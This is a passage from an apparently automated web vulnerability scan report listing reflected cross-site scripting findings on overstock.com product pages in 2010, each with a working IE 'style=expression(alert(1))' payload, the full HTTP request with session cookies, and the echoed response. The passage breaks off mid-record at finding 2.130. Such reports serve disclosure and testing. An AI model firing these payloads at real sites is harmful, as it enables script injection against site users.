Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:48 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:49 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404968974:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4565140|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:49 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:49 GMT; Path=/
Keep-Alive: timeout=5, max=64
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 105795

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Fa
...[SNIP]...
<input type="hidden" name="cf583"style="x:expression(alert(1))"e78249b5e41" value="1"/>
...[SNIP]...

2.124. http://www.overstock.com/Health-Beauty/Farouk-CHI-Original-1-Inch-Ceramic-Ionic-Flat-Iron/1534477/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Farouk-CHI-Original-1-Inch-Ceramic-Ionic-Flat-Iron/1534477/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 911db"style%3d"x%3aexpression(alert(1))"d7e35dfcee6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 911db"style="x:expression(alert(1))"d7e35dfcee6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Farouk-CHI-Original-1-Inch-Ceramic-Ionic-Flat-Iron/1534477/product.html?911db"style%3d"x%3aexpression(alert(1))"d7e35dfcee6=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:06:39 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:06:39 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcproclicks=1534477|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:39 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408799824:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:39 GMT; Path=/
Keep-Alive: timeout=5, max=41
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 113893

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j17.overstock.com ssl:false -->


<head>

<title>Fa
...[SNIP]...
<input type="hidden" name="911db"style="x:expression(alert(1))"d7e35dfcee6" value="1"/>
...[SNIP]...

2.125. http://www.overstock.com/Health-Beauty/Farouk-CHI-Shooting-Star-to-Earth-1-inch-Styling-Iron-with-Organic-CHI-Oil/4123482/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Farouk-CHI-Shooting-Star-to-Earth-1-inch-Styling-Iron-with-Organic-CHI-Oil/4123482/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bd8a1"style%3d"x%3aexpression(alert(1))"a3062c1c785 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as bd8a1"style="x:expression(alert(1))"a3062c1c785 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Farouk-CHI-Shooting-Star-to-Earth-1-inch-Styling-Iron-with-Organic-CHI-Oil/4123482/product.html?bd8a1"style%3d"x%3aexpression(alert(1))"a3062c1c785=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:06:42 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:06:42 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408802569:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4123482|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:42 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:42 GMT; Path=/
Keep-Alive: timeout=5, max=41
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112105

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j18.overstock.com ssl:false -->


<head>

<title>Fa
...[SNIP]...
<input type="hidden" name="bd8a1"style="x:expression(alert(1))"a3062c1c785" value="1"/>
...[SNIP]...

2.126. http://www.overstock.com/Health-Beauty/Moroccan-Oil-3.4-oz-Hair-Treatment/4494882/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Moroccan-Oil-3.4-oz-Hair-Treatment/4494882/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3d9a5"style%3d"x%3aexpression(alert(1))"e54cec266ec was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 3d9a5"style="x:expression(alert(1))"e54cec266ec in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Moroccan-Oil-3.4-oz-Hair-Treatment/4494882/product.html?3d9a5"style%3d"x%3aexpression(alert(1))"e54cec266ec=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:06:38 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:06:38 GMT
Pragma: no-cache
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:38 GMT; Path=/
Set-Cookie: mxcproclicks=4494882|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:38 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408798446:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=83
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 102940

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j11.overstock.com ssl:false -->


<head>

<title>Mo
...[SNIP]...
<input type="hidden" name="3d9a5"style="x:expression(alert(1))"e54cec266ec" value="1"/>
...[SNIP]...

2.127. http://www.overstock.com/Health-Beauty/Pollenex-by-Conair-Flexible-Teak-Shower-Mat/4413244/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/Pollenex-by-Conair-Flexible-Teak-Shower-Mat/4413244/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload abdaf"style%3d"x%3aexpression(alert(1))"fdebb58eab4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as abdaf"style="x:expression(alert(1))"fdebb58eab4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/Pollenex-by-Conair-Flexible-Teak-Shower-Mat/4413244/product.html?abdaf"style%3d"x%3aexpression(alert(1))"fdebb58eab4=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:02:45 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:02:45 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289404965523:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=4413244|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:45 GMT; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:02:45 GMT; Path=/
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 104891

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j12.overstock.com ssl:false -->


<head>

<title>Po
...[SNIP]...
<input type="hidden" name="abdaf"style="x:expression(alert(1))"fdebb58eab4" value="1"/>
...[SNIP]...

2.128. http://www.overstock.com/Health-Beauty/i.d.-Bare-Escentuals-100-percent-Pure-Moxie-Makeup-Kit/3930813/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Health-Beauty/i.d.-Bare-Escentuals-100-percent-Pure-Moxie-Makeup-Kit/3930813/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 31339"style%3d"x%3aexpression(alert(1))"ef7f3945ed was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 31339"style="x:expression(alert(1))"ef7f3945ed in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Health-Beauty/i.d.-Bare-Escentuals-100-percent-Pure-Moxie-Makeup-Kit/3930813/product.html?31339"style%3d"x%3aexpression(alert(1))"ef7f3945ed=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 17:06:39 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 17:06:39 GMT
Pragma: no-cache
Set-Cookie: mxcproclicks=3930813|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:39 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289408799918:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 17:06:39 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=25
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 109238

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j16.overstock.com ssl:false -->


<head>

<title>i.
...[SNIP]...
<input type="hidden" name="31339"style="x:expression(alert(1))"ef7f3945ed" value="1"/>
...[SNIP]...

2.129. http://www.overstock.com/Home-Garden/24-inch-Espresso-Brown-Leather-Counter-height-Saddle-Bar-Stools-Set-of-2/5039833/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/24-inch-Espresso-Brown-Leather-Counter-height-Saddle-Bar-Stools-Set-of-2/5039833/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cd24"style%3d"x%3aexpression(alert(1))"c01130ffe12 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2cd24"style="x:expression(alert(1))"c01130ffe12 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/24-inch-Espresso-Brown-Leather-Counter-height-Saddle-Bar-Stools-Set-of-2/5039833/product.html?2cd24"style%3d"x%3aexpression(alert(1))"c01130ffe12=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:24:24 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:24:24 GMT
Pragma: no-cache
Set-Cookie: mxcsurftype=3; Domain=.overstock.com; Path=/
Set-Cookie: mxclastvisit=20101110; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:24:24 GMT; Path=/
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcproclicks=5039833|; Domain=.overstock.com; Expires=Thu, 10-Nov-2011 16:24:24 GMT; Path=/
Set-Cookie: cinfo=ccnt^0:ctmst^1289406264912:ccid^144812; Domain=.overstock.com; Path=/
Set-Cookie: mxcgotoast=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: mxcoriginal=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: ostk_affiliate=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Keep-Alive: timeout=5, max=97
Connection: Keep-Alive, Keep-Alive
Encoding: iso-8859-1
Vary: Accept-Encoding,User-Agent
P3P: CP=CAO DSP COR CUR CUSi OUR BUS PHY ONL PUR NAV STA
Content-Type: text/html;charset=iso-8859-1
Content-Length: 112784

<!DOCTYPE HTML PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN">


<html>
<!-- Copyright 2009 Overstock.com -->
<!-- all rights reserved -->
<!-- j19.overstock.com ssl:false -->


<head>

<title>24
...[SNIP]...
<input type="hidden" name="2cd24"style="x:expression(alert(1))"c01130ffe12" value="1"/>
...[SNIP]...

2.130. http://www.overstock.com/Home-Garden/A-Walk-in-the-Rain-Hand-painted-Canvas-Art-Set/5105715/product.html [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.overstock.com
Path:   /Home-Garden/A-Walk-in-the-Rain-Hand-painted-Canvas-Art-Set/5105715/product.html

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73179"style%3d"x%3aexpression(alert(1))"859c5084c71 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 73179"style="x:expression(alert(1))"859c5084c71 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Request

GET /Home-Garden/A-Walk-in-the-Rain-Hand-painted-Canvas-Art-Set/5105715/product.html?73179"style%3d"x%3aexpression(alert(1))"859c5084c71=1 HTTP/1.1
Host: www.overstock.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: mxcsurftype=3; mxcgotoast=; mxclastvisit=20101109; ostk_affiliate=; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; ostk_aggr_year=mxcuserseed^8394596845770816512|csbtmst^|csbcrt^|csbsfl^|mxcskupage^60|pageresult^60|country^US|currency^USD|language^en; ostk_aggr_session=csbshow^0|searchhistory^keywords|mxcshopmore^/search%3Fkeywords%3D`b6dfc</script>Hoyt.LLC.XSS.PoC.11.8.2010%26searchtype%3DHeader%26taxonomy%3D; SSSC=2.G5537593483273029007.1.224.3548; ostk_campaign=cmpgn_up_dt^1289320155890|cmpgn_or_up_dt^1289320155890|cmpgn_cid^144812; mxccamid=; mxcoriginal=; clubogiftcards=clubogctotal^0.00; SSLB=B; s_pers=%20gpv_p13%3DHomePage%2520-%2520Default%7C1289344534565%3B; SSID=AwBYsCkAAAAAQnrZTH9BAQFCetlMAQBCetlMAAAAAAAAAABCetlMAQDgAAAA3A0AAAI; cinfo=ccnt^0:ctmst^1289325790830:ccid^144812; se_list=se_list^0|3|; SSRT=QnrZTAE;

Response

HTTP/1.1 200 OK
Date: Wed, 10 Nov 2010 16:30:05 GMT
Server: Apache
Expires: Wed, 10 Nov 2010 16:30:05 GMT
Pragma: no-cache
Set-Cookie: mxccamid=; Domain=.overstock.com; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
